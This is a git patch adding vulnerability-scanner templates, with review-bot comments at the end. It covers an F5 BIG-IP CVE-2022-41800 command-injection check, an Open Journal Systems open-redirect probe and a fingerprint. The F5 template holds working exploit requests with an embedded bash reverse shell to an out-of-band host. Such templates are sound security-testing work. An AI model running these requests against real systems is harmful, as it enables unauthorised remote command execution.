From 4e15d9af34057e13fe3a944558f95f5646c07455 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Tue, 3 Dec 2024 12:41:23 +0000
Subject: [PATCH] Auto Update Nuclei [Tue Dec 3 12:41:23 UTC 2024] :robot:
---
 .../experience_manager/CVE-2019-16469.yaml | 2 +-
 plugins/apache/solr/CVE-2024-45216.yaml | 2 +-
 .../CVE-2022-41800.yaml | 102 ++++++++++++++++++
 .../pkp-lib-open-redirect.yaml | 30 ++++++
 .../open_journal_systems.yaml | 22 ++++
 5 files changed, 156 insertions(+), 2 deletions(-)
 create mode 100644 plugins/f5/big-ip_access_policy_manager/CVE-2022-41800.yaml
 create mode 100644 plugins/public_knowledge_project/open_journal_systems/pkp-lib-open-redirect.yaml
 create mode 100644 web-fingerprint/public_knowledge_project/open_journal_systems.yaml
diff --git a/plugins/adobe/experience_manager/CVE-2019-16469.yaml b/plugins/adobe/experience_manager/CVE-2019-16469.yaml
index 3fde5a0da..4190fc9a1 100644
--- a/plugins/adobe/experience_manager/CVE-2019-16469.yaml
+++ b/plugins/adobe/experience_manager/CVE-2019-16469.yaml
@@ -57,4 +57,4 @@ http:
 - type: status
 status:
 - 200
-# digest: 4a0a00473045022100b8107c5947766cf2638bfdd0e4a92732bf4e18779ff1aad867c74a49ddf6013402206a666dc4c99eedfb76b4f1461f4aaea2fab88cb8a06c6b08202e181eca195760:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a0048304602210082a6643645b37e01702752b369d5254b3ae3d9f54ebe564751e3ba7fa7b50d75022100b5ec6f99589fd782251e81288b7f5371de99c72c79d0a95e80a956314b737dd6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/plugins/apache/solr/CVE-2024-45216.yaml b/plugins/apache/solr/CVE-2024-45216.yaml
index 0276b7486..368b6ceff 100644
--- a/plugins/apache/solr/CVE-2024-45216.yaml
+++ b/plugins/apache/solr/CVE-2024-45216.yaml
@@ -51,4 +51,4 @@ http:
 - type: status
 status:
 - 200
-# digest: 4a0a00473045022100ae5bd685c595998e6ed0fd5828e7a2f3a5988569acecbdf4e33d8f6e56793db9022019a245a90b88bbe1fb3294adf2d31a394ef37202bdb7320ef69604e7e4ed0020:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009b754f6c37b0d92438636734fe3b337640249ddb1cdde8b77ae21fed14a9885602206fa4c72b7d7d5ef40885c9be4956f9b87c0d9045db5e3daf60096887a947adb4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/plugins/f5/big-ip_access_policy_manager/CVE-2022-41800.yaml b/plugins/f5/big-ip_access_policy_manager/CVE-2022-41800.yaml
new file mode 100644
index 000000000..c06563037
--- /dev/null
+++ b/plugins/f5/big-ip_access_policy_manager/CVE-2022-41800.yaml
@@ -0,0 +1,102 @@
+id: CVE-2022-41800
+
+info:
+ name: F5 BIG-IP Appliance Mode - Command Injection
+ author: dwisiswant0
+ severity: high
+ description: |
+ When running in Appliance mode, an authenticated user assigned the Administrator role may bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint.
+ impact: |
+ A successful exploit can allow the attacker to execute remote commands on server using authorization bypass (CVE-2022-1388).
+ reference:
+ - https://attackerkb.com/topics/ZClTQn4aG4/cve-2022-41800/rapid7-analysis
+ - https://support.f5.com/csp/article/K97843387
+ - https://support.f5.com/csp/article/K13325942
+ - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
+ - https://nvd.nist.gov/vuln/detail/cve-2022-41800
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
+ cvss-score: 8.7
+ cve-id: CVE-2022-41800
+ cwe-id: CWE-77
+ epss-score: 0.0109
+ epss-percentile: 0.84818
+ cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 2
+ verified: true
+ vendor: f5
+ product: big-ip_access_policy_manager
+ shodan-query:
+ - http.title:"big-ip®-+redirect" +"server"
+ - http.html:"big-ip apm"
+ fofa-query:
+ - body="big-ip apm"
+ - title="big-ip®-+redirect" +"server"
+ google-query: intitle:"big-ip®-+redirect" +"server"
+ tags: cve,cve2022,rce,f5,bigip,instrusive
+
+variables:
+ auth: "admin:{{rand_text_alpha(1)}}"
+ rand_app: "{{to_lower(rand_text_alpha(6))}}"
+ rand_ver: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}"
+ rand_rel: "{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}.{{rand_text_numeric(1)}}"
+
+http:
+ - raw:
+ - |
+ POST /mgmt/shared/iapp/rpm-spec-creator HTTP/1.1
+ Host: {{Hostname}}
+ X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}}
+ Authorization: Basic {{base64(auth)}}
+ Content-Type: application/json
+ Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host
+
+ {
+ "specFileData": {
+ "name": "{{rand_app}}",
+ "srcBasePath": "/tmp",
+ "version": "{{rand_ver}}",
+ "release": "{{rand_rel}}",
+ "description": "\n\n%check\nbash -i >& /dev/tcp/{{interactsh-url}}/{{rand_text_numeric(4)}} 0>&1",
+ "summary": "{{to_lower(rand_text_alphanumeric(10))}}"
+ }
+ }
+
+ - |
+ POST /mgmt/shared/iapp/build-package HTTP/1.1
+ Host: {{Hostname}}
+ X-F5-Auth-Token: {{to_lower(rand_text_alpha(1))}}
+ Authorization: Basic {{base64(auth)}}
+ Content-Type: application/json
+ Connection: keep-alive, X-F5-Auth-Token, X-Forwarded-Host
+
+ {
+ "state": {},
+ "appName": "{{rand_app}}",
+ "packageDirectory": "/tmp",
+ "specFilePath": "{{spec}}",
+ "force": true
+ }
+
+ extractors:
+ - type: json
+ part: body
+ name: spec
+ json:
+ - ".specFilePath"
+ internal: true
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
+
+ - type: word
+ part: body
+ words:
+ - "RUN_BUILD_RPM_TASK"
+ - "shared:iapp:build-package:buildrpmtaskstate"
+# digest: 4a0a00473045022100a57e06512c7cc80aef74d56ff148ef58a0f939b086187a95fd62f41c7262294002203fef201e4c490cae24a33d78bc67b26465f0588c882a57e4af211ca22aafd40c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/plugins/public_knowledge_project/open_journal_systems/pkp-lib-open-redirect.yaml b/plugins/public_knowledge_project/open_journal_systems/pkp-lib-open-redirect.yaml
new file mode 100644
index 000000000..2d38a504a
--- /dev/null
+++ b/plugins/public_knowledge_project/open_journal_systems/pkp-lib-open-redirect.yaml
@@ -0,0 +1,30 @@
+id: pkp-lib-open-redirect
+
+info:
+ name: Open Journal Systems pkp-lib - Open Redirect
+ author: ritikchaddha
+ severity: medium
+ description: |
+ Public Knowledge Project pkp-lib is vulnerable to Open redirect due to a lack of input sanitization in the setLocale function.
+ reference:
+ - https://github.com/pkp/pkp-lib/issues/7575
+ classification:
+ cpe: cpe:2.3:a:public_knowledge_project:open_journal_systems:*:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: public_knowledge_project
+ product: open_journal_systems
+ fofa-query: body="pkp-lib"
+ tags: pkp,ojs,open-journal-system,pkp-lib,redirect
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php/index/user/setLocale/NEW_LOCALE?source=@oast.me"
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*){{Hostname}}@?(?:[a-zA-Z0-9\-_\.@]*)oast\.me\/?(\/|[^.].*)?$'
+# digest: 4a0a0047304502206f7c2a55023e27e8d5b8017b9af1487fa60a457332f3de1772a0a52f44844e36022100def384ea2602620751e108152dc6f80e18253d8b8a6d926fc895b4ca8799e46b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/web-fingerprint/public_knowledge_project/open_journal_systems.yaml b/web-fingerprint/public_knowledge_project/open_journal_systems.yaml
new file mode 100644
index 000000000..cd2516b72
--- /dev/null
+++ b/web-fingerprint/public_knowledge_project/open_journal_systems.yaml
@@ -0,0 +1,22 @@
+id: open_journal_systems
+info:
+ name: open_journal_systems
+ author: cn-kali-team
+ tags: detect,tech,open_journal_systems
+ severity: info
+ metadata:
+ fofa-query:
+ - body="pkp-lib"
+ product: open_journal_systems
+ shodan-query:
+ - cpe:"cpe:2.3:a:public_knowledge_project:open_journal_systems"
+ vendor: public_knowledge_project
+ verified: true
+http:
+- method: GET
+ path:
+ - '{{BaseURL}}/'
+ matchers:
+ - type: word
+ words:
+ - pkp-lib
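Review bot: The `classification` block of pkp-lib-open-redirect.yaml carries only a `cpe` and no weakness id, unlike the other CVE template in this commit; open redirect is CWE-601, so add `cwe-id: CWE-601` beside the `cpe` line. Separately, `{{Hostname}}` is interpolated unescaped into the regex matcher, so any `.` in the host matches an arbitrary character; this is unlikely to change results in practice, but it is worth a sentence in the `description` so a later maintainer does not tighten the pattern by accident.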
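Review bot: The fingerprint's only matcher is the bare word `pkp-lib` with no `part`, so any page that merely mentions the library name (a changelog, a blog post, a mirror) will presumably be tagged as Open Journal Systems, yet the metadata declares `verified: true`. A marker tied to OJS-rendered output, or a second word under `words:` combined with `condition: and`, would make the detection far less noisy. As a point of style, `http:` uses a flush sequence (`- method: GET`) while the nested sequences and the sibling template in this commit indent theirs; pick one form file-wide (yamllint `indent-sequences`).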